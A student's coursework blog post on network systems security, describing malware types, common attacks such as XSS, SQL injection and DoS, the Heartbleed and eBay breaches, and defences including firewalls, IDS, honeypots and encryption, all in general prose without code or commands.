Wednesday, 22 October 2014

Network Systems Security

Task 1 (a)
Viruses & Worms
A virus is a program that can be loaded and ran onto your computer without the user knowing. Some virus carrier programs could be macros, games and email attachments. Virus can be used for many different things such as from slowing down the performance of the user’s computer by duplicating different files/folders which will take up the computers resources, to a program that can see everything that you are doing which can be used to obtain personal information such as bank details.
A worm is similar to a virus, but instead does not need a carrier program and can spread from computer to computer, unlike a virus it has the capability to travel without any action from a user. A huge problem with worms is that it can largely replicate itself on a user’s system and could end up sending hundreds or even thousands of worms to everyone on your emails for which the same process could happen to them if clicked on. Worms are one of the best ways to bring down a complete network as the worms can just keep duplicating.

Trojans & Backdoor
A Trojan can look like a piece of software that is supposed to be helpful but instead once installed onto a system they can cause data theft and loss, as well as system crashes or slowdown. Trojans are often downloaded along with other programs or software packages. Trojans can also create a backdoor on your computer that can give hackers access to your system which can allow for your confidential or personal information to be compromised.
Backdoor is a piece of software which is used by hackers to open ports or any other vulnerability on a user’s computer. The hacker will then know what ports open to exploit the system, which then allows the hackers to send different tools and techniques through the open ports.

Spyware & Adware
Spyware are programs that can secretly record what you are doing on your computer. The purpose of spyware is to capture passwords, banking credentials and credit card details which can then be used by hackers to commit fraud. Spyware is like a Trojan in the way that it can be downloaded within another program that you have downloaded without the user actually knowing or wanting to. Spyware steals from the user by using the computer's memory resources and also by using up a lot of bandwidth as it sends information back to the hacker by internet connection, as a lot of resources are being taken up by the spyware this can also result in frequent system crashes or even making the users system unstable.
Ad-ware is software that automatically displays or downloads advertising material such as pop-ups or banners when a user is online. The software could seem like it is needed for your computer as a pop up message may say  your computer has a virus click here for a free scan when in fact when the user does click to get the scan it is fake and will give the user a virus.

Key logger & Rootkits
Key loggers are a piece of surveillance software that is used to capture every key you type into your computer, which is then saved onto a log file that can then be transferred to a hacker over the network to a remote computer or Web server, who can use the file to check everything that you may have entered to check all your personal/confidential information such as passwords to bank accounts and email addresses. Some key loggers can also be used to take screenshots. Key loggers can also be used by employers to ensure employees use work computers for business purposes only.
A rootkit is a type of software designed to hide the fact that an operating system has been compromised. Rootkits are used to hide malware, bots and worms without the anti-virus actually picking them up. To install a rootkit, an attacker must first gain access to the root account. Rootkits are difficult to detect because they are activated before your system's Operating System has completely booted up, so even with a good antivirus rootkits may still not be detected.

Impact of Operating Systems, using off the shelf software and configuration vulnerability
If there are vulnerabilities within an operating system then it will be open for attack by malicious programs. Many system administrators install operating systems with the default settings such as not setting a password or changing the username, resulting in potential vulnerabilities that remain unpatched.
There can be many vulnerabilities with application software, especially with customized software or from downloading for unknown websites as although these pieces of software may seem legit, they may contain extra software that can seem to be useful but in fact is a piece of malware that is designed to harm your computer either by monitoring your system or slowing down system performance. Off the shelf software is usually safe as you know where it is from and you will know it will be safe if it is sealed and brought from big companies such as PC World or Microsoft.

Dictionary & Brute Force Attack
The concept of the dictionary attack is a method of getting into a password protected computer or server by systematically entering every word in a dictionary as a password. A dictionary attack can also be used to find the key necessary to decrypt an encrypted message or document. Dictionary attacks are not very successful against systems that use multiple words, combination of letters and numbers and also uppercase and lowercase letters. If that is the case then the brute force attack method (automated software) is used, which is where every possible combination of characters and spaces is tried upon a certain length. The brute force attack may be very successfully but can take a very long time to actually obtain correct passwords.

Social engineering
Social engineering refers to psychological manipulation of people into performing actions or giving away confidential information. This is a big threat as someone may seem nice but really it is a type of confidence trick for the purpose of information gathering, system access or even by committing fraud by obtaining your personal bank information or email addresses. Social engineering is done by human interaction over the phone, text, mail or face to face, such as someone wanting to gain access to a network could say they urgently needed access to sort out a major problem which then someone may give then the password to the network when really they want to gain confidential information from it. Social engineering can also be done by using phishing which is used to convince people to divulge sensitive information such as usernames, passwords, credit card details and sometimes even money. Phishing is used to make a website or a program seem like it original and trustworthy but really it’s a fake duplicate which is used by hackers to obtain information, which most of the time works as people think they are logging in or paying money to the correct website. A well-known social engineering scam is known as the '419 scam.

Email spamming/Phishing
Email spam (also junk email) is a bunch of emails set to numerous users in which clicking on the email may send users to phishing websites or sites that host malware. To protect against email spam, email filtering can be used to organise emails according to criteria. Greylisting is a method of defending users against email spam. A mail transfer agent using greylisting will temporary reject any emails from a sender it does not recognise, but if the email is legitimate the server will try again and after sufficient time has elapsed the email will be accepted. A spamtrap is a honeypot used to collect spam. Spamtraps are usually email addresses that are made to lure spam.  
Spoofing
Spoofing’ is falsifying the origin of an internet communication in order to mislead users into thinking they are visiting the real website or email when in fact it’s a fake lookalike. Spoofing is widely used to create fake emails or web pages that look real in order to steal money, passwords or banking credentials.

Task 1 (b)

Technology and impact of XSS Attack

Cross Site Scripting (XSS) is one of the most common application-layer attacks which targets scripts imbedded in a page which are executed on the users web browser. XSS attacks occur when an attacker uses a web application to send malicious code, usually in the form of a browser side script, to a different end user, so when a user visits this web page the script is downloaded to their browser and executed. Cross-site scripting attacks are used to bypass access controls and to impersonate users.














Technology and impact of SQL injection attack   
The SQL injection attack is code injection technique, used to attack data driven applications where malicious SQL commands are inserted into an entry field for execution through a web page. Injected SQL commands can alter SQL statement and compromise the security of a web application.

Dos Attack, DDoS Attack and spoofing
The DoS (Denial of service) attack is when an attacker attempts to prevent users from accessing information or services by targeting your computer and network which will prevent users from accessing emails or online websites such as a bank account. The most common type of DoS attack is when an attacker floods a network with too much information that when a user wants to visit a site, they can’t because the server can only process a certain amount of requests.
The DoS attack can have a huge impact on an organisation as it can prevent all users from doing any work as it will stop people within the organisation from accessing important information or services such as their work emails or their website which may contain important information to get work done, but will not be able to as the have been attacked by DoS. For an organisation to be attacked by Dos it can result in a loss of a lot of money and slow or even no productivity, also it can affect the reputation of the organisation if workers are not being able to get work done and customers are not receiving a service.
The DDoS (Distributed Denial of Service) attack is when a system is targeted by overwhelming it with hundreds and thousands of requests forcing it to shut down. For all these requests to be sent to a target an intruder usually uses bots so that it makes it hard for the intruder to be caught and so it also looks less suspicious with requests being send from many computers rather than just one, which effectively makes it impossible to stop the attack simply by blocking a single IP address and is also very difficult to distinguish legitimate user traffic from attack traffic when spread across so many points of origin.
The spoofing technique can be used for a successful DDoS attack by a hacker using a third party organisation network to attack a victims organisation as the incoming packets will look like they are coming from a trusted source so will allow the packets which will then crash the victims network. Also the technique is used to cover the hacker’s footsteps as he is not directly sending the packets and cannot easily be traced back.

Google Hacking technique
The Google hacking technique is a computer hacking technique that uses Google search to find security holes in the configuration and computer code that websites use. So if an organisation has all its staffs usernames and passwords stored into the server and has not been changed so that it cannot be read by Google then it means that if someone types the correct search into Google then they will be able to find the text document will all the usernames and passwords of people working within the organisation which can be a massive security breach if there confidential information is used as hackers can tamper with their accounts and cause big problems for the organisation. For an organisation to protect against Google hacking, a user will create a robot.txt document with a list of all the pages they want hidden so they cannot be seen by Google.

Task 1 (c)
The Heartbleed Bug
The Heartbleed bug is a serious vulnerability in the recent years that affected many major websites. The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. The bug allowed anyone on the internet to read the memory of the systems protected by the vulnerable versions of the open SSL software, the bug allowed attackers to obtain data directly from the services and the users to impersonate services and users.
Affected major sites include Facebook, Instagram, Tumblr, Google search, Gmail, Yahoo and Yahoo Mail, Netflix, YouTube, Amazon web services and Dropbox. There wasn’t a real technique but someone did exploit a loophole in the Open SSL which was used to attack major websites.
The attack was dealt with a new version of Open SSL called Fixed Open SSL. Operating system vendors and distribution, appliance vendors, independent software vendors have to adopt to fix and notify their users as they have to install the fix to stop them from being attacked.
eBay data breach
The data breach affected up to 145 million eBay customers, in order for people to secure their data everyone was ordered to change their passwords. The breach comes from hackers compromising a small number of employee log-in credentials, which gave access to eBay’s corporate network allowing hackers to obtain all eBay users confidential data. This breach of security would decrease the reputation as it is a massive buyer/seller company which allowed hackers to see over 145 million customers personal information, although eBay stated that no money could be taken users confidential information could still be seen such as home address, name and date of birth. The attack was dealt with by eBay sending millions of emails to all users telling them to change their passwords to block out any hacker if they were viewing their account. eBay stated that if any email contained a link directing them to a page to reset their passwords then it would be a phishing email as eBay sent emails with no external links. To stop future attacks all users must make sure they have complicated unique passwords that are different to any other accounts you may have.
Task 2 (a)
Different features to secure email
Hoax Email
Hoax emails are also known as spoof emails meaning falsified. Hoax emails are when the sender changes parts of an email to make it look as though it was authorised by someone else, meaning that the senders name/address and body of the message may appear to look like they are from a legitimate source such as from the bank, newspaper or legitimate company on the web.

S/MIME to protect hoax email
Secure/Multipurpose Internet Mail Extensions provide a constant way to send and receive MIME data. S/MIME provides cryptographic security services for electronic messaging applications in different ways such as authentication, message integrity, using digital signatures and also data confidentiality using encryption. S/MIME can be used by mail agents to add cryptographic security services to mail that is sent and to interpret cryptographic security services in mail that is received. S/MIME can also be used with any transport mechanism that transports MIME data such as HTTP.
To protect against hoaxing damage a few things can be done such as generate alerts, develop and implement company email use policy, consider a single point of entry for email to your site so that mail will be much easier to monitor, configure your mail delivery daemon to prevent someone from connecting to your SMTP port to send spoofed emails to other sites and also the header of emails often contain a complete history but this can be spoofed.

Spam guard
Spam guard is a way of stopping emails from flooding a server which works by the patterns within the emails based on black lists. Spam guard helps reduce the amount of spam you receive in your inbox by diverting most of it to your junk mail folder. With spam guard you can use filters to sort out emails with specific senders, subject or body text. A spamtrap honeypot can be used to attract spammers to fake email addresses. Spam guard will add all the incoming email senders to a blacklist, as emails sent to those addresses will most likely be spam. Grey listing will temporary reject emails from a sender it does not recognise.

Wireless networked security/Networked devices security
There are a few ways in which you can secure your wireless network to stop hackers or other users from accessing it. You can use a security password so that when you go to connect to the wireless network you will have to enter the password that only you or anyone else with authorized access will know. Another way to secure a network is to change the name of the network such as if the name is BTWIFI-JW7843 a hacker may be able to find out the model of the network and be able to download the right software to hack into the network so the name should be changed to something such as the name of the organisation. Another big problem with hackers is that there may be someone outside an organisation with a strong Wi-Fi signal giving users free access to internet which they will use as it is free and will think it’s coming from a trusted source as it may be called Halifax free Wi-Fi when in fact it’s a hacker wanting users to connect to the access point to hack into their devices, so to stop this from happening every organisation should do Wi-Fi checks making sure there are no other access points that are not trusted in and around the organisation for users to connect to. All the MAC addresses of the users devices have to be saved to the wireless access point so that if anyone tries to connect to the network then they won’t be able to as they don’t have access.

Use of transmission media
UTP (unshielded twisted pair) cable is a popular type of cable that consists of two unshielded wires twisted around each other. UTP is a low cost cable so UTP cabling is widely used for local-area networks (LANs) and telephone connections. UTP cabling does not have as high bandwidth or as good protection from interference as coaxial or Fiber optic cables. UTP cable has 4 cables that carry the data and 4 twists that protect the data from EMI.
STP (shielded twisted pair) cable cables have a conducting shield encasing the twisted wire pairs which blocks out electromagnetic interference, allowing the cable to carry out data at a faster speed. Shielded cables are much more expensive than unshielded cables but give you much better protection against EMI.
So using a shielded cable instead of unshielded cable is safer as you won’t be interrupted by electrical interferences but it will cost a lot more than unshielded. Shielded cables are not always necessary and only bigger companies will mainly use them or places such as factory’s with large electrical equipment, whereas small offices will mainly use unshielded as it is cheap and still does the job.

Access Control
There are three factors of access control which are, something you know (Password, PIN etc.), something you have (card reader, ID card etc.) and something you are (biometrics such as fingerprint or retina scan). Access control is a way of limiting access to a system or physical or virtual resources. In computing access control is used for users to be granted access and certain privileges to systems, resources or information (this is mostly used in organisations to allow certain staff to have access to certain data based on their job role). Access control is used hugely for security so that unauthorized users can not gain access to certain information or places. A key card may be used to allow access to a certain area in a company, a fingerprint scan may be used to access a personal phone or a password may be used to access a personal computer system or server.

Secure Password
Having a secure password is very important as it what helps to keep hackers away from accessing our personal/confidential data. Passwords can be hacked in different ways such as from simply just guessing to dictionary based attacks and phishing. Never have a password that will be easy to remember such as a family, friend, favourite place or pet name as people that know you may be able to easily guess these passwords. A recommended way to create a more secure and memorable password is to follow a repeatable pattern, which will enable your password to be recreated when needed. These are a few steps that should be followed in creating a secure and memorable password:

  • Start with a memorable phase such as usesecurepasswords
  • Change every other letter to uppercase, resulting in UsEsEcUrEpAsSwOrDs
  • Change “a” to “@” and “s” to “5” to yield U5E5EcUrEpa55wOrD5
  • Drop every other pair to result in a secure repeatable password 5cUrEpa5wOrD
Following these steps will give you a password that meets all the requirements, yet can be changed (remade) if necessary.

Intrusion Detection System (IDS)
Intrusion detection system is used to detect unauthorized entries and alert responsible entity to respond. An ID system gathers and analyses information from various areas within a computer or a network to identify possible security breaches. IDS check’s all inbound and outbound network activity and identifies if there are any suspicious pattern that may end up in an attack on a network or system from someone attempting to compromise a system.

Intrusion Prevention System (IPS)
IPS is used in a computer security which provides policies and rules for network traffic along with an IDS system for alerting administrators for potential harmful traffic, but allows the administrator to undertake action from being alerted. So IPS identifies potential threats and allows the administrator to respond quickly to them by looking at the incoming traffic and seeing if the packet should be dropped or not if it seems to be harmful.

Use of encryption
Encryption is the process of encoding messages or information so that it is only understood by authorised users only. Some modes of encryption may provide higher levels of protection than others so the more important data/information may be the better level of encryption it may use. Encryption is also used on websites, wireless networking security and remote access to prevent eavesdropping and spoofing.

Task 2 (b)
Active & Passive IDS
In a passive system the IDS detects a potential security breach and then logs the information and signal an alert to either the administrator or user, for which it is up to them to take action to block the activity or respond in some way, whereas in an active system the IDS responds to the suspicious activity by logging off a user or by reprogramming the firewall to block network traffic from the suspected malicious source, so whereas in passive IDS the user has to do something about any suspicious activity in reactive IDS it deals with any suspicious activity without user input.

Networked and Host IDS
In a network based system individual packets flowing through a network are analysed for which NDIS can detect malicious packets that are designed to be overlooked by a firewalls simple filtering rules.  In a host based system the IDS examines the activity on each individual computer or host. Network based IDS is very good when wanting to protect the whole network which makes it have better protection than host based IDS but is all that is needed for a home network. Although NDIS gives better protection, host based IDS uses up a lot less resources.

Knowledge Based and Behaviour Based IDS
Many IDS tools are knowledge based for which knowledge-based intrusion detection techniques apply the knowledge accumulated about specific attacks and system vulnerabilities which the IDS contains information about the vulnerabilities and looks for attempts to exploit them. When an attempt is detected an alarm will be triggered to warn the administrator. Knowledge based IDS has many advantages such as that they have very low false alarm rates and that the contextual analysis proposed by the IDS is very detailed which makes it easier for people using the IDS to take action to prevent or correct the problem. The maintenance of knowledge based IDS requires careful analysis of each vulnerability, which can take up a lot of time.

Behaviour–based IDS techniques assume that an intrusion can be detected by observing a difference from normal or expected behaviour of the system or users. The model of normal or accepted behaviour is taken from reference information for which the IDS later compares this model with current activity. When an irregularity is observed an alarm is generated. There are also many advantages of behaviour-based IDS such as that they can detect attempts to exploit new and unforeseen vulnerabilities and also they can help detect 'abuse of privileges' types of attacks that do not actually involve exploiting any security vulnerability. Behaviour-based IDS has a high false alarm rate and also the information system can undergo attacks at the same time the intrusion detection system is learning the behaviour.

Firewall and how it works
Firewall is a piece of software/hardware that is built into the router which is a first line of defence to a network that checks for information coming from the internet/network, and then either blocks it or allows it to pass it through to your computer depending on your firewall settings. Firewall is based on rules which are set by the user. Many organisations prefer to have the firewall before the router so that the router does not get overloaded with all the traffic at once. If a data packet has a certain pattern the firewall will know if it’s bad because of ACL (Access control List) which is where the firewall has a database of thousands of rules used to determine different data packets. Packets coming through the network will have content and a header to show the IP address of where the packets are from and the there is a CRC (Cycle redundancy check) to see if the packets have arrived to the destination completely intact and none have been dropped by any electrical errors.

Different types of Firewall
The first generation of firewall was the packet filtering firewall, then proxy firewall was used and now the current generation of firewall that is used is Stateful inspection firewall.

Packet Filtering Firewall
The first generation of firewall available to the public and one of the most basic firewall was packet filtering firewall which checks every single data packet and controls what data can flow in to and out of a network, but the firewall does not check the content or header so it makes it easy for hackers to bypass the firewall by amending the content and header.

Stateful Inspection Firewall
The current generation of firewall that is used is the stateful inspection firewall which keeps a record of all the incoming and outgoing traffic, so the firewall works on a trust basis where if certain packets has entered through the firewall before and was already trusted several times then less inspection is needed whereas if new packets are entering the firewall then a more thorough check will be mad to see if the packets can be trusted or not. The state table (which keeps a record of all the connections within the network) will be changed regularly making it a bit of a slower firewall than product filtering.



Proxy Firewall
The proxy firewall had very good security as all the traffic coming in and out through the proxy firewall allows for very good control such as allowing you to monitor who is visiting what websites and easily allows you to block certain content, which is very good to be used in organisations and schools. The security is also very good because all the data packets that go through the firewall will every part of the data packet will get checked, but this can lead to slowing down the whole network as every detail of the packets are checked.

HoneyPot
A honey pot system is a computer that usually sits in the screened subnet or DMZ and attempts to attract attackers to it instead of to the actual production computers. Hackers will try to attack through the web and database server, but for protection a replication server is used and set up by the administrator who will enable services and ports that are popular to exploit to attack attackers and keep their attention away from the real servers. Using honey pot the replication allows the administrator to monitor what techniques hackers are using which can allow greater protection for the real servers and you can protect yourself from the techniques hackers are using. Many organisations will buy a normal computer but uses honey pot software to make it look like it is very powerful and has all the real data, which makes it look like it is important which will attack the attackers.

Anti-Virus
A virus is a piece of malware that tries to harm your computer in different ways. The Anti-Virus picks up the malware that gets through the firewall. An anti-virus is a specialised anti-virus software engine that works based on signatures that checks many files on your computer then notifies the user, which can then remove the piece of malware. It is important to keep your anti-virus updated and that you scan your computer for threats regularly.
Anti spyware
Anti spyware is similar to an antivirus, they help to block and prevent spyware and malware infections. Anti spyware monitor incoming data from emails, websites and downloads of files and stops spyware programs from infecting the computer operating system.